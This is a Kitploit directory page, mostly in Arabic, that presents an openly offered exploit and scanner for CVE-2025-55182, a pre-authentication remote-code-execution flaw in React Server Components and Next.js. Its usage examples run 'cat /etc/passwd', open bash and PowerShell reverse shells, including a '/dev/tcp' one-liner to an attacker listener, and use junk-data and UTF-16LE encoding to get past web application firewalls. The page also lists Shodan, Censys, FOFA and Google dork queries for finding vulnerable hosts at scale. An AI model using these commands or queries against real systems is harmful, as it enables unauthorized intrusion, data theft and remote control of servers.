Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Waf — CVE-2025-55182 ثغرة RCE في خوادم Next.js/React RSC (أداة استغلال وماسح ضوئي) | Kitploit
أدوات/GitHubGitHub/l0n3m4n/cve-2025-55182-waf
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubl0n3m4n/cve-2025-55182-waf

CVE-2025-55182-Waf

CVE-2025-55182 ثغرة RCE في خوادم Next.js/React RSC (أداة استغلال وماسح ضوئي)

عرض المستودع
21منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

ماسح واستغلال Next.js/React RSC - RCE

Facebook X Medium Buy Me a Coffee ProtonMail


تم تصميم هذه الأداة للباحثين في مجال الأمن ومختبري الاختراق لاكتشاف واستغلال ثغرة CVE-2025-55182 في تطبيقات Next.js/React RSC. توفر الأداة أوضاع مسح متعددة، وميزات استغلال، وتقنيات لتجاوز جدار حماية تطبيقات الويب (WAF).

✨ الميزات

  • 🎯 أوضاع مسح متعددة: اختر بين أوضاع rce وsafe وvercel_bypass.
  • 💥 استغلال سهل: تنفيذ أوامر أو الحصول على قشرة عكسية على الأهداف المستهدفة.
  • 📂 حمولات مخصصة: توفير حمولات مخصصة كنص أو من ملف.
  • 🛡️ تجاوز WAF: تقنيات لتجاوز جدران حماية تطبيقات الويب.
  • ⚡ سريع ومتزامن: يفحص أهدافًا متعددة باستخدام asyncio.
  • 📝 مخرجات مفصلة: مخرجات منسقة وتفصيلية لسهولة التصحيح.
  • 🎨 مخرجات ملونة: لقراءة أفضل.
  • 🤖 كشف نظام التشغيل تلقائيًا: يكتشف تلقائيًا نظام تشغيل الهدف (Linux/Windows) لاستغلال أكثر ذكاءً، خاصةً للقشور العكسية.

📈 تفاصيل الثغرة

🎯 الإصدارات المتأثرة

تؤثر هذه الثغرة على الإصدارات التالية من مكونات خادم React:

  • مكونات خادم React: 19.0.0 و19.1.0 و19.1.1 و19.2.0
  • إصدارات Next.js ≥14.3.0-canary.77 وجميع إصدارات 15.x و16.x
  • أطر العمل التي تستخدم RSC: React Router (وضع RSC)، وWaku، وRedwood SDK، والعديد من إضافات RSC

الحزم التالية متأثرة أيضًا:

  • react-server-dom-parcel
  • react-server-dom-turbopack
  • react-server-dom-webpack

🛠️ التثبيت```bash

git clone https://github.com/l0n3m4n/CVE-2025-55182.git cd CVE-2025-55182

Create a virtual environment

python3 -m venv venv-55182 source venv-55182/bin/activate

Install dependencies

pip install -r requirements.txt

root@kitploit:~
## الاستخدام```bash
❯ python3 CVE-2025-55182.py -h

__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE]
                         [-wb] [-wbs KB] [-wbu] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]

Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications

options:
  -h, --help                       show this help message and exit
  -u, --url URL                    Single URL to scan or exploit.
  -f, --file FILE                  File containing a list of URLs to scan/exploit.

Exploitation Options:
  -c, --command COMMAND            Command to execute on the target(s).
  -p, --payloads PAYLOAD           Custom payload to execute on the target(s). Can be a string or a
                                   file path.
  -r, --reverse-shell LHOST:LPORT  Attempt a reverse shell.

Scanning Options:
  -sm, --scan-mode MODE            Scanning technique. Choices: {rce, safe, vercel_bypass}. (default:
                                   rce)
  -wb, --waf-bypass                Add junk data to the request to bypass WAFs.
  -wbs, --waf-bypass-size KB       Size of junk data in KB (default: 128).
  -wbu, --waf-bypass-utf16le       Use UTF-16LE encoding to bypass WAFs.

General Options:
  -o, --output FILE                File to save vulnerable URLs from scans.
  -t, --threads NUM                Number of concurrent threads (default: 10).
  -T, --timeout SEC                Request timeout in seconds (default: 10).
  -P, --proxy URL                  Proxy to use (e.g., http://127.0.0.1:8080).
  -H, --header HEADER              Add custom headers (e.g., 'Cookie: session=...').
  -v, --verbose                    Enable verbose output for success/failed/non-vulnerable checks.

🔬 أوضاع المسح

  • rce (الافتراضي): وضع المسح النشط، ينفّذ أمر echo لتأكيد الثغرة. هذه هي الطريقة الأكثر موثوقية، لكنها قد تترك سجلات على النظام المستهدف.
  • safe: وضع مسح القناة الجانبية، لا ينفّذ أوامر. يتحقق من رسالة خطأ محددة (E{"digest") لتحديد ما إذا كان الهدف معرّضًا للثغرة. هذا الوضع أكثر أمانًا من وضع rce، لكنه قد يكون أقل موثوقية.
  • vercel_bypass: يستخدم حمولة محددة لتجاوز جدار حماية تطبيقات الويب (WAF) الخاص بـ Vercel ويتحقق من مخرجات الأمر في ترويسة X-Action-Redirect.

تقنيات ترميز مختلفة لتجاوز WAF

الفضل لـ @coffinxp7 wafbyass

🚀 أمثلة

المسح```bash

Scan a single URL with the default rce check

python3 CVE-2025-55182.py -u http://target.com

Scan a list of URLs with the safe mode and 20 threads

python3 CVE-2025-55182.py -f urls.txt -sm safe -t 20

Scan with Vercel WAF bypass mode and save vulnerable URLs to a file

python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt

root@kitploit:~
### الاستغلال```bash
# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"

# Use WAF bypass techniques
python3 CVE-2025-55182.py -u http://target.com -c "whoami" -wb

# Use a custom payload string
python3 CVE-2025-55182.py -u http://target.com -p "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"

# Use a custom payload from a file (windows target)
python3 CVE-2025-55182.py -u http://target.com -p windows_revshell.sh

# Get a reverse shell (linux default reverse shell) 
python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444

# Get a reverse shell using a payload file (linux target)
python3 CVE-2025-55182.py -u http://target.com -p linux_revshell.sh

# Force a windows reverse shell payload if auto-detection fails
python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444 --os windows

# Intercept in Burpsuite  
python3 CVE-2025-55182.py -u http://target.com -wbu -P http://127.0.0.1:8080

💻 مسح هدف ضعيف```bash

$ python3 CVE-2025-55182.py -u http://target.com

root@kitploit:~
```bash
__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\[_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \__  \ _/ ___	__\/  ____/  \_____  \ |  |  \/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \ ___\|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 
        
[+] VULNERABLE: http://target.com (Mode: rce)

المسح مع الإخراج المفصّل```bash

$ python3 CVE-2025-55182.py -u http://target.com -v

root@kitploit:~
```bash
__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

[+] VULNERABLE: http://target.com - Status: 500 (Mode: rce) (OS: Linux, Web Server: nginx/1.29.3)
    Target Information:
        Detected OS: Linux
        Server Software: next.js
        Content Type: text/html; charset=utf-8
        System Time: Sat, 06 Dec 2025 19:59:32 GMT
    Response snippet:
      HTTP/1.1 500 Internal Server Error
      Date: Sat, 06 Dec 2025 19:59:32 GMT
      Content-Type: text/html; charset=utf-8
      Content-Length: 4615
      Connection: keep-alive
      X-Powered-By: Next.js
      ETag: W/"1207-I2098797987"
      Vary: RSC, Next-Router-State-Tree

root@kitploit:~
$ python3 CVE-2025-55182.py -u http://target.com -v
root@kitploit:~
__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

[-] NOT VULNERABLE: https://tryhackme.com
[*] Verbose output for https://tryhackme.com:
    Target Information:
        Detected OS: Unknown
        Server Software: cloudflare
        Content Type: text/html; charset=UTF-8
        System Time: Sat, 06 Dec 2025 19:59:32 GMT
    Status Code: 500
    Response Headers:
        Date: Sat, 06 Dec 2025 19:59:32 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 4615
        Connection: keep-alive
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Referrer-Policy: same-origin
        X-Frame-Options: SAMEORIGIN
        Server: cloudflare
        CF-RAY: 9a9e5d42b96204be-HKG
    Response Body (first 500 chars):
        <!DOCTYPE html>
        <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
        <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
        <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
        <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
        <head>
        <title>Worker threw exception | tryhackme.com | Cloudflare</title>
        <meta charset="UTF-8" />
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta http-equiv

الاستغلال باستخدام أمر```bash

$ python3 CVE-2025-55182.py -u http://target.com -c "whoami && echo "" && cat /etc/passwd"

root@kitploit:~
```bash
__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

[*] Exploiting: https://target.com with command: whoami && echo "" && cat /etc/passwd
[+] COMMAND EXECUTED SUCCESSFULLY - Status: 500
----------------------------------------
nextjs

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
----------------------------------------

الاستغلال باستخدام الشل العكسي```bash

$ python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444 -v

root@kitploit:~
```bash
__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

[*] Attempting reverse shell to 10.10.10.1:4444 from http://target.com
[*] Detected OS: Linux
[*] Using Linux (bash) reverse shell payload.
[*] Please start your listener, e.g., nc -lvnp 4444
[*] Payload sent. Check your listener.
root@kitploit:~
$ python3 CVE-2025-55182.py -u http://windows-target.com -r 10.10.10.1:4444 -v
root@kitploit:~
__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

[*] Attempting reverse shell to 10.10.10.1:4444 from http://windows-target.com
[*] Detected OS: Windows
[*] Using Windows (powershell) reverse shell payload.
[*] Please start your listener, e.g., nc -lvnp 4444
[*] Payload sent. Check your listener.

تجاوز WAF باستخدام UTF-16LE```bash

❯ python3 CVE-2025-55182.py -u http://target.com/apps -c "id && ls -al" -wbu

__________ __ ________ . . .
_
__ \ ____ _____ / |_ \ / /| | ____ | | | |
| // __ \
\ / \ / / _ \ | | _/ __ | | | |
| | \ / / __ \ _| | / \ / | Y \ /| || | |
|
/_
>
/___ >| _____ /_______ /|| /_ >_/__/ / / / / / / / /
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit

[*] Exploiting: http://target.com/apps with command: id && ls -al [+] COMMAND EXECUTED SUCCESSFULLY - Status: 500 (Web Server: nginx/1.29.3)

3443983266

root@kitploit:~
![utf-16](https://assets.kitploit.com/production/public/readmes/28258/b540c1e9fb07316478772ec219d6f4f86437947215e5604353e9b9d59296f8ed.png)
### خطأ الشبكة```bash
python3 CVE-2025-55182.py -u http://target.com:3000 -c "id" -v

__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

[*] Exploiting: http://target.com:3000 with command: id
[-] FAILED TO EXECUTE COMMAND
[*] Verbose output for http://target.com:3000:
    Status Code: -1
    Response Headers:
        (No headers received)
    Response Body (first 200 chars):
        An error occurred: HTTPConnectionPool(host='target.com', port=3000): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f846d6caa50>, 'Co

📂 الحمولات

تأتي الأداة مع حمولات صدفة عكسية جاهزة مسبقًا لأنظمة Linux وWindows.

  • linux_revshell.sh: صدفة عكسية بلغة Bash.
  • windows_revshell.ps1: صدفة عكسية بواسطة PowerShell.

📚 مراجع إضافية

  • نشرة أمان فيسبوك
  • مدونة React: ثغرة أمنية حرجة في React Server Components

🔎 العثور على الأنظمة المعرضة للثغرات

Shodan

  • http.component:"next.js"
  • http.favicon.hash:-1766382332 (Vercel favicon)
  • "x-powered-by: Next.js"

Censys

  • ((Next.js) and services.software.product="Next.js") and services.port=3000
  • services.http.response.body: "_next/static"
  • host.services.endpoints.http.headers:(key:"Vary" and value:"RSC, Next-Router-State-Tree")

Google Dorks

  • inurl:"/_next/static"
  • intitle:"Next.js"
  • site:com intitle:"Next.js"
  • inurl:.com ("Next.js" OR "React")
  • site:com ("Next.js" OR "_next/static")
  • site:gov.cc ("Next.js" OR "React")
  • site:com ("/_next/static" OR "/static/js")
  • site:com ("React error" OR "Next.js error")

BinaryEdge

  • header:"x-powered-by: Next.js"

Zoomeye

  • app:"Next.js"
  • http.body="react.production.min.js" || http.body="React.createElement(" || app="React Router" || app="React.js"
  • vul.cve="CVE-2025-55182"

FOFA

  • app="NEXT.JS" || app="React.js"

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية والبحثية فقط. لا تستخدمها على أي نظام دون إذن صريح. المؤلف غير مسؤول عن أي ضرر ناتج عن استخدام هذه الأداة.

📝 المشكلات

طلبات السحب (PR) مرحب بها :)

تنزيل الأداة
الفئةالمعلومات
تاريخ النشر2025-12-03
الدرجة الأساسية10.0 (حرجة)
الباحثLachlan Davidson (https://github.com/lachlan2k)
المتجهCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
الوصفثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في مكونات خادم React. تتأثر التطبيقات التي تستخدم وقت تشغيل React من جانب الخادم بما في ذلك أطر العمل مثل Next.js. السبب هو إلغاء تسلسل غير آمن لبيانات بروتوكول “Flight” غير الموثوقة، مما يسمح للمهاجم بتحقيق تنفيذ تعليمات برمجية قبل المصادقة على الخادم. يلزم التحديث إلى إصدارات React وأطر العمل المُصححة.
درجة EPSS27.81% (احتمالية الاستغلال)
كتالوج CISA KEVمُدرج: نعم، برامج الفدية: غير معروف
نشاط HackerOneالترتيب: 1، التقارير: 92
أولوية التصحيحA+